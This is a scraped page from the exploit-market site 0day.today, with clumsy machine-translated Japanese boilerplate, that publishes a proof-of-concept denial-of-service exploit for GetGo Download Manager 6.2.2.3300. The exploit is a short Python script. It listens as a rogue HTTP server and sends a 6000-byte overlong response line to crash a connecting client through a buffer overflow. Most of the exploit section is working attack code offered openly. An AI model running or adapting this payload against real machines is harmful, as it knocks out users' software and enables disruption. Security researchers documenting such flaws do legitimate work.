0day.today - 最大、世界でのデータベースを利用します。
![](/img/logo_green.jpg)
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GetGo Download Manager 6.2.2.3300 - Denial of Service Exploit
# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service # Author - Malav Vyas # Vulnerable Software: GetGo Download Manager 6.2.2.3300 # Vendor Home Page: www.getgosoft.com # Software Link: http://www.getgosoft.com/getgodm/ # Tested On: Windows 7 (64Bit), Windows 10 (64Bit) # Attack Type : Remote # Impact : DoS # Co-author - Velayuthm Selvaraj # 1. Description # A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and # earlier could allow Remote NAS HTTP servers to perfor DOS via a long response. # 2. Proof of Concept import socket from time import sleep host = "192.168.0.112" port = 80 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((host, port)) sock.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = sock.accept() print "[+] Connected to %s" % addr[0] evilbuffer = "A" * 6000 buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n" print cl.recv(1000) cl.send(buffer) print "[+] Sending buffer: OK\n" sleep(30) cl.close() sock.close() # 0day.today [2024-07-01] #